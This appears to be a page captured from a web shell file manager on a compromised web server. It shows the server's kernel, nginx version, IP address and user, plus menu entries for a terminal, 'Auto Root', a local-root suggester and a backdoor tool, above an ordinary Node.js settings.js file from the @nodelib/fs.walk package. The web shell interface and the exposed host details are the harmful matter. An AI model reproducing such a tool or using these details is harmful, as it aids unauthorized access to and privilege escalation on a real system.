Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.22.62
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
@nodelib /
fs.walk /
out /
Delete
Unzip
Name
Size
Permission
Date
Action
providers
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
readers
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
types
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
index.d.ts
1019
B
-rw-rw-r--
2022-08-30 11:49
index.js
1.36
KB
-rw-rw-r--
2022-08-30 11:49
settings.d.ts
1.15
KB
-rw-rw-r--
2022-08-30 11:49
settings.js
1.22
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); const path = require("path"); const fsScandir = require("@nodelib/fs.scandir"); class Settings { constructor(_options = {}) { this._options = _options; this.basePath = this._getValue(this._options.basePath, undefined); this.concurrency = this._getValue(this._options.concurrency, Number.POSITIVE_INFINITY); this.deepFilter = this._getValue(this._options.deepFilter, null); this.entryFilter = this._getValue(this._options.entryFilter, null); this.errorFilter = this._getValue(this._options.errorFilter, null); this.pathSegmentSeparator = this._getValue(this._options.pathSegmentSeparator, path.sep); this.fsScandirSettings = new fsScandir.Settings({ followSymbolicLinks: this._options.followSymbolicLinks, fs: this._options.fs, pathSegmentSeparator: this._options.pathSegmentSeparator, stats: this._options.stats, throwErrorOnBrokenSymbolicLink: this._options.throwErrorOnBrokenSymbolicLink }); } _getValue(option, value) { return option !== null && option !== void 0 ? option : value; } } exports.default = Settings;